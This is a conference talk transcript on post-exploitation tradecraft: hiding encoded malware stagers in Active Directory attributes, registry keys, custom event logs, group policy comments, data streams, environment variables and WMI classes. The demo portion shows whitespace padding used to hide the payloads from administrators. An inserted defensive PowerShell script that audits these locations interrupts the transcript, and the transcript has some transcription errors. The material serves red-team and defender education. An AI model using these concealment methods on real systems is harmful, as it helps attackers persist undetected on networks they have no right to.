
Having your pick of the litter: Storing Malware Stagers in Enterprise Services

BSides Charleston · 2019 · 53:48 · Published 2019-11

Category: Technical · Style: Talk
About this talk
Security BSides 2019, College of Charleston, SC, November 9, 2019, @BSidesCHS. Title: "Having your pick of the litter: Storing Malware Stagers in Enterprise Services". Speaker: Fernando Tomlinson.

Transcript [en]

All right, so welcome, welcome to Having Your Pick of the Litter: Storing Malware Stagers in Enterprise Services. This is very Windows-heavy. Oh, a little bit about myself: I'm with the Department of Defense, been within roughly eighteen years. Started off as a system administrator, moved into SOC defense, if you will, about six years ago, led an incident response team through a number of high-visibility incidents, and then moved over to vulnerability assessment, red team, if you will, and now I'm going to be the director of an operations center where we do both vulnerability assessment, red team, and incident response. I'm an adjunct cybersecurity professor at a local college down in Augusta, Georgia; that's why I come to you all

from. I developed a number of red and blue team tools. I like PowerShell, you'll see that throughout this, and I'm out throwing the interwebz in a couple of places. All right, so here's the agenda. We'll really highlight the history of sorts, talk about some malware, talk about the kill chain or a methodology, we'll go through utilizing said methodology or tactic to hide stagers in enterprise services, and then I'll end this with a demo in which I'll highlight or really walk through each one of those. All right, so first we've got to kind of start off with definitions. So this whole malware thing, all right, what is it? Well, you see a lot of text up there, but

really the meat and potatoes of it is that malware is gonna be an actual piece of code developed by somebody to actually inflict something on a person's machine, whether they want to actually take it down, whether they want to take over it, but nonetheless it's gonna be code at heart. It's kind of interesting when we think about malware now; there's different variations of it, but before we even get into that, let's talk about where it all started. Well, roughly back in 1971 there was a guy by the name of Ben Thomas who actually developed the Creeper malware, and literally what it did is write through the screen "I'm the Creeper, catch me if you can," and it propagated

by hand. It was very manual in nature; we're talking floppy disks, right? Can't even find a floppy disk these days. I say that like some organizations still have them. But that was the first piece of what we know to be malware, and it relied on human interaction. That's kind of interesting, because now, today, we don't see human interaction being a necessity as much, right? And today we see things that are much more sophisticated, right, much more streamlined, maybe broken up into different phases, if you will, and they're constantly evolving. It's a constant cat-and-mouse game. From a defense perspective you're consistently trying to highlight what adversaries are doing, trying to put things in place in which you can

articulate and really highlight the activities that they're doing, and as a red team or vulnerability assessment person you're just sitting there trying to find some loophole, bust that software, and find something that allows you to gain some code execution, and even better a shell. A root shell is really what we're after, right? But it also has some financial gain with it, because we have criminals doing it for the purpose of financial gain, we have governments doing it, right, trying to get after the political game, and in all honesty it's almost like a silent war happening that we don't see on the streets or really see as much in the news, unless it's some well-known

company of sorts. So when we look at the common types of malware, all right, we see what's before us, and generally speaking I think worms and viruses are kind of the thing we previously always thought about when we mentioned malware, but now we see a lot of ransomware. So we're definitely in the financial game, right, where somebody's trying to get code execution on the system; they want to encrypt the drive, they want to hold the system for ransom. We see rootkits; that's always been a thing, all right. There's user mode, most common; there's actual kernel level, very sophisticated, right, at that point it makes it a little bit more difficult to trust the system to really even identify

it; and then you have like a hypervisor version of it, so we can get in the inner workings of actually working with virtual machines. Trojans kind of go without saying. Keyloggers are definitely much more prevalent, especially when you think about people trying to do things for financial gain or gain in execution or access to a machine. Then we have grayware, right: adware, spyware, the bloatware that comes on brand-new computers, if you will. Those are always gonna be around. But all the malware has to have some method to hide, all right? Unless you're like Rick James and you don't really care, typically you're gonna want to hide your malware, and some

typical aspects to do that is you're gonna use some type of packer, maybe UPX or something else, where you want to add your malware in with some legitimate program. Maybe you want to use a crypter, in which, if somebody was trying to reverse engineer that payload, aspects of that data may be encrypted, may be much more difficult for them to actually understand. Polymorphic, much more sophisticated, consistently changing its data set and itself as it traverses, right? Think of how signatures are ever gonna find that. Heuristics, um, good luck, right? So polymorphic is definitely much more sophisticated. Then we have stagers. They're definitely on the rise, and this allows us to really

survey a machine or do something to a machine before the real malware comes, right? So we can all think about some sport, maybe it's boxing: there's the main ticket and then there's these other people who are boxing before the main ticket. We can almost think of those other folks as the stagers, right? They're prepping the battlefield, if you will, getting everybody hyped for the real deal, and the real deal is gonna be the malware which the stagers come to give. So a little bit more about these stagers: we know them as droppers, downloaders, but nonetheless they should be tiny, all right? You typically would not want to use a full Meterpreter payload as a

stager, but generally speaking, if we're going to exploit, if that is the method in which we're going to use to get on the system, we may have a very limited amount of space that we can actually use for our payload, and this is where stagers actually come in good with us. And once we get access to that machine, our stagers should allow us to actually interact with that machine, i.e., our stager will have that machine contact us so we can then either task it for something else or send an actual real payload that's gonna actually sit resident on the system. Now the big thing about this is it allows us to break down our toolset.

Malware development is really expensive, either money-wise or man-hour-wise, but nonetheless I'm not gonna willy-nilly just throw my payload all over the place and see what sticks. I want to get on a system, survey it, understand if it's even a good candidate for me to do something with it, and then at that point lay it down, right? Maybe my surveying is what type of antivirus they have on there, what's the state of the system, is this a system owned by somebody like my mother who doesn't know much of what's going on in the system, or is this some aspiring young computer science student or some type of admin, a person who's really into the

machine. Now looking at the delivery mechanism, we have something like this: we have the system being exploited and our stager being part of it, and then we have the system reaching back out to our C2 server. Generally speaking, when that system reaches back out it's probably gonna be on some type of well-known port in which general client machines would talk on, right? So I probably wouldn't have my stager hosted at, you know, quad fours or something like that; in that case it would blend in a lot more with normal traffic. But when it reaches back out and we're talking, at that point I may have something else for it to grab, and it could be a virus, worm,

something else, right? It could be just other instructions, but nonetheless it's like that main ticket or that heavyweight fight, right? My system is gonna, I'm sorry, that system's gonna then reach out, grab whatever that next stage is. Once we have that we're gonna set up some type of encrypted C2 channel where periodically, every hour or whatever the case, we would then have the ability to interact with each other. Generally I wouldn't have that C2 server actually initiate communication with that implant or whatever my follow-on payload is; I'd have this guy, on some period of time, random period of time, like, I don't want the periodicity to be so clear-cut where you could be like, hey, every three hours

on the dot this thing is actually reaching out, but with some periodicity in which this guy may come out, check my C2 server, see if I got anything else for it, and then execute them. Common tasks go without saying: I want to survey it, what is this data, the machine. I may have some other payloads that I want to lay down, but I want to ensure that that system has the requisite software installed, or maybe this thing doesn't hold any true wealth for me to be able to do something follow-on within the organization. This also allows me to validate whether it's running in a virtual machine or not, right? Maybe this is some honeypot of sorts, or if I

understand that organization and most of their stuff is virtualized, then I could really deem that as normal, if you will. The other thing about using a stager is that additional payload we reach out to grab: we could actually inject that into memory, reflectively inject that DLL, and at that point our DLL wouldn't touch disk, thereby being a little bit stealthier in that aspect. When we look at just a generalized methodology of sorts we can refer to the Cyber Kill Chain. The Cyber Kill Chain has been around since roughly 2011, developed by Lockheed Martin, and there are a number of methodologies that all kind of articulate the same thing, but ultimately just highlight really how somebody would

look to do something. So the interesting thing about this is this is gonna be linear in nature; every step is almost required for the next. So if I had my young child here, you know, my little five-year-old, and I was chasing him, it would be me trying to catch up to him. Instead I'm gonna try to pass him, get in front of him so I can then block him or entertain him or whatever it is my goal is. So the goal here, or really the idea here from a defense perspective: if you can identify the methodology in which an attacker or an adversary would take, you can then get ahead of them, so that way

you're not sitting there trying to follow, but you're more or less getting around and then blocking, stopping, identifying, and mitigating aspects of which they would need to achieve the further they go along. What we're really gonna focus on here, though, is not the exploitation perspective; we're gonna focus more on the installation piece, where we're actually going to lay something down and then we're going to utilize that to communicate back with our C2 server. All right, a common tactic to do this, and I wish I had a disclaimer here, because this is not the only way, it is one of a few ways to actually go through it. It's almost like eating a Reese's, right? There's no wrong way to really do that

unless you dip it in milk; that's just, that's not right. Oh, so a way to do this is we'll take whatever our data is, we'll convert it to bytes, we'll base64 it, and then we'll store it somewhere. So the premise of this talk is utilizing enterprise services, and this is specifically Microsoft; we're gonna utilize the very things that Microsoft calls features and we're gonna store some code there. This code today is gonna be benign; it's just gonna print a string back to the screen to let you know all is well. But this approach is very post-exploitation, all right? This isn't telling you how to get on the box; you're already on there. Now you're looking at the next stage, and this kind

of fits the category of paulus, if you know. The interesting thing about this is what we're going to lay down as our stager is going to be an IP address, or it could be a URL, and then we're gonna lay down a URI after that actually specifying the file that we want to download. So what do we lose if that gets burned? Well, I lose an IP address if I'm using an IP; if I'm using a domain, I lost the domain, I can go buy another one for a dollar ninety-nine. And then whatever I specify as the file that I'm downloading, I could lose that name, right? That doesn't really help a defender, because today the file that

I'm gonna host is called stager.ps1, but if you ask somebody what's in that file, nobody would know unless they went out there and downloaded the sample of it. So what are you really losing, right? I'm lessening the surface in which I, as an offensive person, could become burned or show my hand as to what I'm doing. All right, so we'll start with Active Directory. Active Directory, from an enterprise perspective, that's gonna be the authentication and authorization mechanism for user accounts throughout a network, same thing with computers. Active Directory is a structure which is typically an array of objects, and the most common objects are the users, computers, and actual groups. Now the database

itself is stored in System32\ntds.dit, so if we were trying to take over an organization, maybe dump some hashes, it's not about us getting the SAM hive, because that's gonna be local; in an enterprise we would want that. That's another topic. The big thing about this is when we look at Active Directory Users and Computers we see the top screenshot there. Cool, we see things like OUs, organizational units, and then we have sub-OUs there as well, and under each one of those organizational units we may have other objects. In this case we have some users, we have some groups, we also see some sub-organizational units as well. Interesting

thing about this is people aren't typically quick to create users, they're not always typically quick to delete users, or if I move from one section to the next they may give me or change my rights, but it may not go back and take those, so we see things like privilege creep and a number of other things come up. But from a GUI perspective that's how an admin may look to actually access Active Directory. We can utilize something like PowerShell and access Active Directory as well, and we see the same names there that we see as part of that OU there. If we were to click on an actual object we're presented with a number of

properties about that object; roughly there's about 50 of them. If we go tab to tab we'll see these properties, and generally speaking each one of those properties has the ability to store some amount of data, whether it's one character, 512, right, it just really varies from field to field. Now there's also a number of fields that are not shown by default, generally speaking, in each one of those tabs. If you're familiar with Active Directory you can go along the toolbar and actually enable Advanced Features and you'll get things like Attribute Editor. Now in Attribute Editor you'll be able to see the fields that are not typically shown by default, and I'll highlight that as I do the demo. So when we looked at

this user, we're looking at the same stuff within PowerShell. So this is good, because if we can get our code in there, our stager: domain users by default have the ability to read objects in Active Directory, so that's cool. Now I can almost use this as a file share, if you will, and I can go from box to box and have that user read that actual account and grab that code. So now we kind of move to the registry. Registry goes without saying; it is amazing. From a defense perspective it's awesome for forensics and artifacts; from an offense perspective it is like a kid in a candy store, there's just too much, right? So if you've

ever been an admin and can tell me about every key in the registry, I'd be interested, right, because there's just way too much in there for any one person to be able to know every particular key. So if that's the case, that makes a good place for us to get our code in, and the fact that we can get our code in allows us to really skate under the radar a little bit more. Now when we look at the registry we have the hives that sit on disk, and then we have the hives that are loaded into, or what they assemble into, in memory upon the system booting up or somebody actually logging in. So

in the user's profile there's an NTUSER.DAT that is specific to the individual user; when he or she logs on it becomes their HKCU. And then we have System32; we have stuff like HKLM, I'm sorry, SAM, SOFTWARE, SYSTEM. Those, along with a number of other ones, become what we know as HKLM. Now we also see the linkage between those items, so we have our hives on disk on the left and then we have what they become in memory on the right. The good thing about this, or not really the good thing, is if we were trying to affect the SECURITY hive: when the system boots up it gets loaded into memory and

it's locked, all right? So that's really, really good in the sense that we know it's gonna get used, it's gonna be loaded in, so we can get code in there; it's a high-availability method for us to actually use. If we were just looking at the registry we're used to seeing regedit, right? And for us to store code there, I like to go several layers deep. I like to look for just random places; I don't even care what the key is really used for, all right, because the deeper it is, the less likely somebody's gonna be looking at it. So in this case we're not very deep, but we're in the user's hive, we're within Software and then

Sysinternals, and then I see a key for the EULA, so they've used Strings before and they accepted that EULA. And then I can look at the same data by utilizing PowerShell, and I see the EULA highlighted there. The short here is we're showing that you can utilize the GUI but you can also utilize the command line. This is gonna be key once we get into the demo piece, because largely everything I'm gonna do is in the command line, and then we'll go back to what it looks like in the GUI because that's what most admins are gonna be utilizing. So we have event logs. So this is gonna be detailed records of things happening on the system. Generally speaking we have

audit entries that, if enabled, are written to event logs. If somebody was gonna wipe an event log it would generate an event 1102, so that gives some reassurance to an admin that if they can write stuff to the event log they have a good record. The interesting thing about this is there's a huge amount of event logs, like huge, right? We see where those event logs are stored at on disk. There are some tactics to wipe event logs in a good way; actually, I can't think of any good reason why anybody would want to do it, but if we were doing it from an adversary perspective there's a couple of tactics that we can do it without

an admin being able to see it. They do overwrite themselves, so an admin likely would have something write to the event log and then ship it off to like ELK, Splunk, or whatever their centralized log aggregation server is. But when we talk about there's a huge amount: just looking at a Server 2016 virtual machine I had, a dev box, nothing special, I had roughly 380 unique logs. Not talking about log entries; we're talking about unique logs. Now generally admins know about Security, System, Application, maybe some small other ones, but I don't know how many people can name more than 15, 20 logs that are actually in the system. So the fact that we have several hundred gives

me some pleasure in utilizing this. Now, reading an event log, we would use Event Viewer, the GUI aspect, and we would see an actual message and we see some other data about it. We can utilize PowerShell, as you see below, to essentially read that log as well. Now, if that's not enough for you, you have the ability to write custom logs. So from a defense perspective, maybe I have my dev shop who developed this in-house tool and they didn't build in any inherent logging, so now I can utilize something like PowerShell, write my own custom logging to get it in the event logs. From an offense perspective, I see a place in which we create our own event log that

could, we already got 385, what does it matter, we have 386, right? We'll just add one more on to it, and now we can write our code there and go back and retrieve it at another time. Reading it is such like this: so I've made a new event log, or actually I made a source within the Application event log, and then I wrote just "an app has started," and then when I go look at that in Event Viewer I see the actual message that I depicted, and then I also am able to read that very same thing utilizing some PowerShell. We have group policy. So group policy is gonna be that infrastructure that

is utilized to implement specific configurations across an enterprise, all right? I remember my time as a helpdesk person, right; they told me I had the most important job in the organization. That was right before they gave me the most work in the organization, right? It was like, hey, we need to update these machines, and we didn't have centralized management, so I was walking around with my disk. Now I'm dating myself: I had a CD book with all kinds of software, and I realized that was no way to treat a human being, right? And, you know, we have things like group policy where we can set it once and then have those settings proliferate across an organization, so it's a

wonderful thing, and then again we find areas that we can take advantage of it. From within Microsoft, group policy itself, there's an enterprise management perspective through Group Policy Management, and then we have the local machine has a Local Group Policy Editor as well. So we're gonna look at doing it from an enterprise perspective; that's gonna give us the most bang for the buck, but either one of them will suffice. And the way we're gonna do that is we'll look at the Group Policy Management from a server perspective. I have a Default Domain Policy, which every domain would have, that, I don't care if it's enforced, linked, or not, but we have this thing called Comments over there. I've never seen

an admin actually use it, ever. So for this, uh, for the sake of this screenshot here, I just put in that this is the default policy linked to the domain or whatever, right? I'm gonna put text there now, but we're gonna utilize that area to store our code. Awesome. Now, before I lay any code down, I'm gonna understand the infrastructure to really highlight, would this tactic work? Like, I'm not gonna go to every machine and try to use MS08-067, right, because that's not gonna work everywhere, but I would want to understand targeting which I'm interacting with. Now our next one is alternate data streams, and some of you may be like, man, really? Yeah. Hey, it still

works, all right, just like that 08-067 I just talked about. So alternate data streams are resident within the NTFS filesystem, and generally speaking that's what our systems are going to be from a Windows perspective. Um, we have the ability to really add in a stream of data, if you will, and if we looked at the size of the file, our data stream size does not affect the actual size of our file, so that's good. Now this was really developed to have a capability match with Macintosh systems, but it's still something that's available. So every file has a $DATA stream, and then we have specific files, depending on how your system is arrayed, but we could also

have zone identifiers. Have you ever been downloading a file, try to run it, and a pop-up said, hey, be careful, this came from the internet, you shouldn't trust stuff, blah blah blah? Well, that was a Zone.Identifier ADS that was attached to your file, saying that zone 3 or 4, whichever one it is, that tags it saying it came from the internet. That's what's highlighting, or really stopping you and prompting you; it's that Zone.Identifier ADS that's being tagged. So an example of this is really good: so I have a file that I created, and right now it has zero bytes. I created an alternate data stream that I'm gonna call mystream and I'm gonna put my

son's favorite, right, Dr. Seuss, in there, and right now the length of that is 35, but still the original file, the donor, if you will, is still that zero bytes. So if I'm gonna use this I would look to want to do it on a file that I know is gonna be there, right, and one for example, not the only one, is the hosts file, right? The hosts file, if I'm going to try to sinkhole a domain or maybe redirect something locally, then I could utilize this hosts file and put in an IP and an actual domain. But regardless of what's in the actual file itself, I'm just gonna be a straphanger with my alternate data stream, and really this

thing, it's gonna be a donor for me. We have environment variables. They're gonna be dynamic in nature, so if we were using the environment variable USERNAME, I'm sorry, USERPROFILE, it would really highlight the profile path for the user that you're logged in as. For example, if I'm logged in as a user called wolf and I said, hey, change directory to environment variable USERPROFILE, it was dynamically set to that environment variable, that's my user profile, that's the path of C:\Users\wolf, blah blah blah. All right, so it can be dynamically set, and this is good. Now we also have the ability to have user environment variables and system ones. We're going to look to get in the system one so that

way it doesn't matter, per se, which person. There's a lot of information that's being utilized here to really set what's going on in our operating system, and the same could be said about whatever programs we have installed there. The same way we have our environment PATH, we can add other things in. So in this case we have our user environment variables up top, I have the system ones that are down in the bottom. These user ones are in my NTUSER.DAT for whatever user it is that I'm logged in as, and then these system ones are part of HKLM. From a GUI perspective, I have where I can

go into the properties of Computer and then I can see up top my user environment variables and down below my system ones. So we're gonna add one into our system ones; we'll come back and check this screen and we'll look at what an admin would actually see and how he or she could actually highlight that we have something going on. And we have WMI and CIM. All right, so from this perspective, WMI was Microsoft's implementation of WBEM, so WBEM is like how we're going to share information across a subset of machines. Within the last couple of years Microsoft has gone away from that and went to CIM, which is Common Information Module, or Model. Both of them somewhat do

the same thing: WMI is gonna use DCOM, CIM is gonna use a thing called WS-Man, but ultimately the namespaces and classes that we're accustomed to from WMI are still available. So we're gonna take advantage of that in the sense of we have these classes, namespaces, that have a particular set of information about them. So these classes have properties and methods, and properties are nothing more than attributes, methods are nothing more than actions. And then if we want to interact with them from a GUI perspective on our system, WBEM has an actual executable in System32 that we can connect to our machine and access all our namespaces and classes, and we'll highlight that too

in our demo as far as how an admin can see that. But when we talk about the sheer amount of them, it's gonna vary from system to system, just like when I add a particular piece of software on my system it may add a new registry key; the same is so for WMI and CIM as far as classes. So on the machine that I ran the demo on I had roughly 10,000, right? Refer back to my comment about the registry: if I can find an admin that can tell me about more than 10 classes, I wouldn't be shocked, I would want to actually talk a little bit more, right? But 10,000, that's a lot just on my system. So if I have

10,112, what difference is it gonna make if I add one more to it? All right, and that's what we'll do. This is gonna help us with storing our code, having it in a place in which an admin largely is not going to see it, so that makes it great for us when we want to come back and actually grab it.
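The storage locations walked through above (Active Directory attributes, deep registry keys, event log messages, the group policy Comment field, alternate data streams, system environment variables, and home-made WMI/CIM classes) can all be swept from the defender's side with a single audit. The script below is an added example and is not code from the talk or the speaker. It assumes the RSAT ActiveDirectory and GroupPolicy modules are present where the AD and GPO checks run; the minimum base64 run length, the registry roots, the seven-day event window, the hosts-file path and the list of "standard" CIM class prefixes are placeholders to tune for your environment.

```powershell
# Added defender-side audit example, not from the talk. Sweeps the enterprise
# "features" the talk describes for values that look like base64-encoded text.
# Assumptions: RSAT ActiveDirectory/GroupPolicy modules for the AD/GPO checks;
# $MinLen, the registry roots, the hosts path and the CIM prefix list are
# tunable placeholders chosen for this example.
param(
    [int]$MinLen = 40,                       # shortest base64 run worth decoding
    [string]$SearchBase = '',                # e.g. 'OU=Staff,DC=example,DC=local' (placeholder)
    [string[]]$RegistryRoots = @('HKLM:\SOFTWARE', 'HKCU:\SOFTWARE'),
    [string]$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
)

$findings = New-Object System.Collections.Generic.List[object]

function Add-Finding([string]$Location, [string]$Name, [string]$Value) {
    $v = $Value.Trim()
    $findings.Add([pscustomobject]@{
        Location = $Location
        Name     = $Name
        Padding  = $Value.Length - $v.Length     # whitespace used to push a value off-screen
        Preview  = $v.Substring(0, [Math]::Min(60, $v.Length))
    })
}

# A value is suspicious when it contains a long base64 run that decodes to
# mostly printable text as UTF-16LE (what -EncodedCommand expects) or UTF-8.
function Test-Base64Blob([string]$Value) {
    if ([string]::IsNullOrWhiteSpace($Value)) { return $false }
    $m = [regex]::Match($Value, "[A-Za-z0-9+/]{$MinLen,}={0,2}")
    if (-not $m.Success) { return $false }
    try { $bytes = [Convert]::FromBase64String($m.Value) } catch { return $false }
    foreach ($enc in @([Text.Encoding]::Unicode, [Text.Encoding]::UTF8)) {
        $text = $enc.GetString($bytes)
        if ($text.Length -eq 0) { continue }
        $printable = @($text.ToCharArray() | Where-Object { [int]$_ -ge 32 -and [int]$_ -lt 127 }).Count
        if ($printable / $text.Length -gt 0.9) { return $true }
    }
    return $false
}

# 1. Active Directory: every single-valued string attribute of every user,
#    not just the three (division, employeeNumber, employeeID) the talk names.
if (Get-Module -ListAvailable -Name ActiveDirectory) {
    Import-Module ActiveDirectory
    $adArgs = @{ Filter = '*'; Properties = '*' }
    if ($SearchBase) { $adArgs.SearchBase = $SearchBase }
    foreach ($u in Get-ADUser @adArgs) {
        foreach ($p in $u.PSObject.Properties) {
            if ($p.Value -is [string] -and (Test-Base64Blob $p.Value)) {
                Add-Finding "AD user $($u.SamAccountName)" $p.Name $p.Value
            }
        }
    }
}

# 2. Registry: every string value under the chosen roots, however deep the key sits.
foreach ($root in $RegistryRoots) {
    Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        foreach ($name in $key.GetValueNames()) {
            $val = $key.GetValue($name)
            if ($val -is [string] -and (Test-Base64Blob $val)) { Add-Finding $key.Name $name $val }
        }
    }
}

# 3. Machine-scope environment variables (the "system ones" from the talk).
foreach ($e in [Environment]::GetEnvironmentVariables([EnvironmentVariableTarget]::Machine).GetEnumerator()) {
    if (Test-Base64Blob ([string]$e.Value)) { Add-Finding 'System environment' $e.Key ([string]$e.Value) }
}

# 4. Alternate data streams on a file that is always present (the hosts file).
Get-Item -Path $HostsPath -Stream * -ErrorAction SilentlyContinue |
    Where-Object { $_.Stream -ne ':$DATA' } | ForEach-Object {
        $content = Get-Content -Path $HostsPath -Stream $_.Stream -Raw -ErrorAction SilentlyContinue
        if (Test-Base64Blob ([string]$content)) { Add-Finding "ADS $HostsPath" $_.Stream ([string]$content) }
    }

# 5. Group policy: the GPMC "Comment" field is exposed as the GPO's Description.
if (Get-Module -ListAvailable -Name GroupPolicy) {
    Import-Module GroupPolicy
    foreach ($gpo in Get-GPO -All) {
        if (Test-Base64Blob ([string]$gpo.Description)) { Add-Finding "GPO $($gpo.DisplayName)" 'Comment' $gpo.Description }
    }
}

# 6. Event logs: recent Application entries whose message body is a blob.
Get-WinEvent -FilterHashtable @{ LogName = 'Application'; StartTime = (Get-Date).AddDays(-7) } -ErrorAction SilentlyContinue |
    Where-Object { Test-Base64Blob ([string]$_.Message) } |
    ForEach-Object { Add-Finding "EventLog $($_.LogName)/$($_.ProviderName)" "EventID $($_.Id)" $_.Message }

# 7. WMI/CIM: classes in root\cimv2 without a standard prefix are listed for
#    review, since one home-made class hides easily among ~10,000.
Get-CimClass -Namespace root/cimv2 -ErrorAction SilentlyContinue |
    Where-Object { $_.CimClassName -notmatch '^(Win32_|CIM_|MSFT_|Msft_|__|Win32Reg|SoftwareLicensing)' } |
    ForEach-Object { Add-Finding 'CIM root/cimv2' $_.CimClassName 'non-standard class name (review)' }

$findings | Sort-Object Location, Name | Format-Table -AutoSize
```

The Padding column is the useful second signal: a value whose stored length is hundreds of characters longer than its trimmed length has been pushed off-screen on purpose, which is exactly what the demo's "not set" plus 250 spaces trick produces. Run the AD and GPO checks from a domain-joined box with RSAT; the registry, environment, ADS and event log checks run on any endpoint.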

okay so now we're going to demo and and think this port through is I didn't mirror it so

you you okay you all right cool so I have another machine that is running a web server and this web server is really dirty it's really dirty in that so you heard of a Python on simple HTTP server all right so we did the same thing in PowerShell we're talking 19 lines probably get it down more than that all right so it's really quick and dirty it's HTTP I can add a certificate on to it if I needed to but nonetheless I can utilize something like invoke web request and I can access that server so I'm just ensuring that I have access to it I see I have a status code of 200 cool so I'm gonna take what is

really my stager and it's that bit of code that bit of code where I'm going to reach out download whatever is being held there and I'm gonna store it in the context of memory so that whole string itself is going to be my stager if this gets caught I lose an IP address I lose that I was reaching for something called stage or ps1 but honestly I couldn't call it it 1 2 3 or ABC Mickey Mouse or whatever right or not United States or whatever right cool so I'm gonna go through and I'm gonna take that string I'm gonna convert it to bytes and then I'm going to convert it to base64 and then I had that base64 code so now

There's my obfuscated string, which I'm gonna lay down in a number of places. As you see, I have it as encoded text, so as I go through these examples I'll be storing encoded text in a variable in all these random different places, and then I'll call upon it. So I'm gonna utilize this person, Nick Schenk, and I'm gonna look at a couple of properties associated with their account. Right now we see employee ID, employee number, and division; those are the three I called upon, and they have nothing in them. Division can hold 256 characters, I want to say employee number is like 512, and employee ID is like 16. There are many more that you can find, but those three aren't available by default.

So what I'm going to do is go into Active Directory, and I'll go into Schenk's computer, I'm sorry, Schenk's account, and I'll come into Attribute Editor. When I come into Attribute Editor, I notice that division has nothing there, so that is the one place that an admin would see it, in Attribute Editor. Now, I would have had to essentially do an advanced view, and I don't know admins that just scroll down Attribute Editor like, oh, let me see what's going on in here. So if that is the case, where an admin is gonna do that, then I'm gonna get a little bit more stealthy. But first I'm gonna store this base64 code there, and we'll look at what it looks like. Cool, so it's there from a command-line perspective, and from a GUI perspective we now see our base64 code.

Depending on the target I might be like, cool, it's there, let's go, or we may want to get a little bit more stealthy with that. So we're going to push that down a little bit, and what I mean by push that down is I'm gonna pad it with spaces, right? I'm gonna push it off the screen so that it forces an admin to actually interact with it to know what's there. Now, I said division takes 256 characters, right? Employee number takes 512. So if I'm already gonna pad it with 250 blank spaces, then I'm now gonna put it in employee number. Now when I go back in here and I look at employee number, we'll see what that looks like. So employee number shows blank, but notice everything else around it that's not set, right? It actually says "not set." If an admin gets to this point, they're like, huh, why does that one not say "not set," and why doesn't it have anything else next to it, and they want to double-click it? Oh, you got it, right?

So let's go a step further with this. We're gonna actually add in "not set," we're then gonna push it down 250 white spaces, and then we'll add in our text. So I'm gonna now overwrite employee number with that. We'll go back in here and we'll look at that. So now when I look at employee number, nothing to see here, right? Now look, if an admin is gonna go double-click every one of these, look, bro, you gotta, like, you have no real job, right? But now when I go in here to actually interact with it, I see my code, I see my whitespace, and I see "not set." I've pushed it off the screen, making it more difficult for me to find. Now when it's time for me to actually execute this, what I'm gonna do is call upon that property, I'm gonna trim "not set," I'm gonna get rid of the whitespace there, and I'm gonna actually feed that base64 to PowerShell. What I have in this stager.ps1 is nothing more than that green text saying "stager test," right? It'll call it proof.txt on the desktop, if you will. The ol' STP Amazon, all right, whoo.

So that's a way for me to do it. Now if I get a new guy on my team, right, everybody's got to cut their teeth somehow, so I'd be like, hey man, welcome to the team, hey, check this out, we're working on Active Directory, I need you to go through every property known to mankind, research it, and find us a property that we can throw data into. Right? Good luck, right? We all have to, like, start somewhere. So that's a way for us to do it.

Now from a registry perspective, I'm gonna utilize this key called Console, and Console itself is, like, super random; I just scrolled down and found it somewhere.

That's how random it is. Now I can't find it... all right, cool, so there it is. So we see nothing's under Console other than something that says "(Default)." That's awesome. So I'm going to create a new item there, and I'm gonna call that value updater32, and then I'm gonna store my code there. Well, why are you calling it updater32? Because, let's be real here, if you add 32 and 64, people will make themselves feel like it's legit. Yeah, looks legit, it's got 32 on it, all right? So we come back in here, we look at this, and you're like, that's ugly. Now we'll go back before, 'cause I'm like, bro, this thing is like six layers deep, ain't no way anyone's gonna find that. Yes, they will. Okay, fine, we'll do something similar to what we did before: we're gonna push that thing down. In this case I'm gonna do updater64, I'm gonna pad it with 250 white spaces, and we're right there as well. So when we come look at this, we now have that. So if an admin is at a point where they're looking at registry keys and they see the key with no value and they want to click on it, really, I guess their indication there is these three dots here; but if they get to a point where they see this and they want to click on it, then cool, I guess they'll stop there. But if they're really nosy, they could scroll over and see my code.

Now, if I want to make this blend in a little bit more: you see how we have this key "(Default)" and it says "(value not set)"? That seems really legit, so I'm gonna do that. All right, so in this case I'm gonna do appcache32, I'm gonna add in "value not set," add in my 250 white spaces, and I'll add in my code. So now, when we have this, we have "value not set," we have some three dots out to the side, so if that triggers them, so be it, but when they click on it we have "value not set," all the whitespace, and then we have our code. So if I get this in such a place where, rest assured, no admin is looking for it, then depending on the defenses I feel like I can get around it. When it's time for me to call upon it, I'll trim that whitespace and everything else associated with it, and I'll be able to execute it.

Now from an event log perspective, I'm gonna create an event log, a brand new one. It's not gonna be System, Security, anything like that; I'm gonna create one called Windows Update, so that is really legit, and I'm gonna utilize a source called updater64. So now that I created this event log, I'm gonna write data to it, and the data I'm gonna write to it is gonna be an event ID of 10 and, you guessed it, my base64 code. So when I come in here and I look at this, we'll be able to actually see it. Okay, you ever had a talk with the demo gods and it was like, yo bro, I got you, you're gonna be good? All right, there's my updater64, or my Windows Updater. When I look at that, I got base64 sitting right there, right? So I'm like, cool, there's 386 logs. Now what if they see this? And I'm also doing this in my own log, because if I did it in the Application log or anything else, we've already said it's gonna roll, it's gonna overwrite, so I don't want to lay down something today, try to come back and utilize it tomorrow, and then, like, the network had so much activity that my log, or my entry, has now rolled. So we'll add some whitespace in there, all right, 'cause whitespace saves everything. When we come back in here now and look at our next entry, we see nothing there; we scroll down, we'll see our code.

So now what I want to do is, essentially, when I look at, like, an Application log or something, there's some text there and I'm good, I typically don't interact with it. If we're trying to scroll down and I see text then whitespace, I assess that that's the end of it. So what we're gonna do is try to get past human nature in that same respect, and I'm gonna say "An update was detected," we'll add in 50 white spaces, and our code. All right, surely if this is the Windows Updater event log, surely something like "An update was detected" is legit. So now we come here, we see "An update was detected"; if they scroll down they'll see my code, but at that point I feel pretty good, I'll sleep good that night. I may worry the next day if I'm waiting on the beacon and we're, like, three minutes past that time; I might go smoke a cigarette, and I don't even smoke. All right, so cool, from an event log perspective. And the same thing: when it's time for me to actually run it, I'm going to call upon that entry, I'll trim all the whitespace and everything else that I have on there, and I will let it rip.

Now from an event log perspective we have the comment field. There's not a way from the GUI that we can edit the comment, so it would force somebody, if they're gonna use it, to utilize the command line. So for us to get after this, we're going to read in, or call upon, the Default Domain Policy, and I'm going to change the description with, you guessed it, my text. And now when I come look at this, I'm like, whoa, that can't be good, right? Because even if an admin is just quickly browsing through, getting ready to interact with it, something like that may stand out. So you can kind of see what we're gonna do here: we're gonna suppress everything. Now, before I was able to use backtick-n for newline, but for some reason backtick-n did not work here, so I found myself almost like I was trying to overflow a buffer, where I was writing in like, no, characters, like, oh crap, I can still see it, let me do another, okay, now I can't see it, that's the magic number.

